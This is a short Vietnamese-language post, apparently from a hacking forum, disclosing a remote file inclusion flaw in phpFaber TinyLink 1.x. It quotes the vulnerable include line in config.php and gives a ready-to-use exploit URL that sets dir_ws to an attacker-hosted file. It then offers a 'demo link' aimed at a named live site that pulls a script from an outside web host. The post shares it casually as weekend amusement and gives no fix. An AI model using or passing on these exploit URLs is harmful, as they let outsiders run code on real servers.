require_once("$dir_ws/tiny_includes/i_INI.php"); http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?  

Cái bug này có lâu rùi, đang ngồi nhâm nhi cafe, sẵn rãnh tay gửi lên cho bà con giải trí cuối tuần luôn vậy !!

Product name: phpFaber TinyLink Affected version: 1.x Type: Remote file inclusion (PHP Include) Vendor: phpfaber.com  

Cái script này dùng để rút ngắn link lại á, giống như là tinyurl vậy, lỗi coding không kỹ của mấy tay coder, đơn giản nó là lỗi PHP Include hay còn một cái tên gọi là : Remote file inclusion File dính lỗi là : config.php, path đầy đủ là : /tiny_includes/config.php Khai thác :

require_once("$dir_ws/tiny_includes/i_INI.php"); http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?  

Link demo : :D) http://sid.to/tiny_includes/config.php?dir_ws=http://www.freewebs.com/camauonline/root/hht.txt?